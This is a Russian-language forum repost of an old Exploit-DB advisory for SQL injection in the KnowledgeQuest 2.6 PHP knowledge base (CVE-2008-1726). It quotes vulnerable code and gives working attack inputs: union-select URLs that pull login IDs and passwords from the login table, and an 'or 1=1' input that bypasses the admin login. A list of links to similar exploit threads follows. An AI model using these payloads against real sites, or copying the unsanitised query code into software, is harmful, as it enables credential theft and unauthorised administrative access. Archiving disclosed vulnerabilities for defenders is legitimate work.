Exploit KnowledgeQuest 2.6 - SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5421
Проверка EDB
  1. Пройдено
Автор
VIRANGAR SECURITY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-1726
Дата публикации
2008-04-09
Код: 
             ########################################################################
             #                                                                      #
             #    ...:::::KnowledgeQuest 2.6 SQL Injection Vulnerabilities ::::.... #           
             ########################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-------
vuln code in articletext.php:
line 13: $kqid = $HTTP_GET_VARS["kqid"];
......
line 17: $result = mysql_query("select DATE_FORMAT(postdate,'%m-%d-%y') as  postdate, DATE_FORMAT(reveiwdate,'%m-%d-%y') as reveiwdate, categoryid,title,text, attach, kqid, authorid from knowledgebase where kqid=" .$kqid.mysql_error());
###########
vuln code in articletextonly.php:
line 13: $kqid = $HTTP_GET_VARS["kqid"];
......
line 17:$result = mysql_query("select * from knowledgebase where kqid=" .$kqid.mysql_error());
--------
Exploits:
http://www.site.com/[patch]/articletextonly.php?kqid=-9999/**/union/**/select/**/1,2,3,loginid,password,6,7,8,9,10,11/**/from/**/login/*
http://www.site.com/[patch]/articletext.php?kqid=-999/**/union/**/select/**/1,2,3,loginid,password,6,7,8/**/from/**/login/*
--------------------------------
                                .::::admin Authentication bypass vuln::::.
vuln code in logincheck.php:
if(!empty($_POST['username']))
    {
        $username = $_POST['username'];
    }

    if(!empty($_POST['password']))
    {
        $password = $_POST['password'];
    }
...
...
...
$sql = "select * from login where loginid='". $username ."' and password='". $password . "'";
-----
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
//you must login in administratorlogin.php ;)
--------------
young iranian h4ck3rz

# milw0rm.com [2008-04-09]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities
Ответы
0
Просмотры
291
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit KnowledgeQuest 2.5 - Arbitrary Add Admin
Ответы
0
Просмотры
246
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
Ответы
0
Просмотры
619
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Color Prediction Game v1.0 - SQL Injection
Ответы
0
Просмотры
601
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit RosarioSIS 10.8.4 - CSV Injection
Ответы
0
Просмотры
591
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit News Portal v4.0 - SQL Injection (Unauthorized)
Ответы
0
Просмотры
588
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Faculty Evaluation System v1.0 - SQL Injection
Ответы
0
Просмотры
596
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit projectSend r1605 - CSV injection
Ответы
0
Просмотры
583
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
Ответы
0
Просмотры
584
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
Ответы
0
Просмотры
600
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу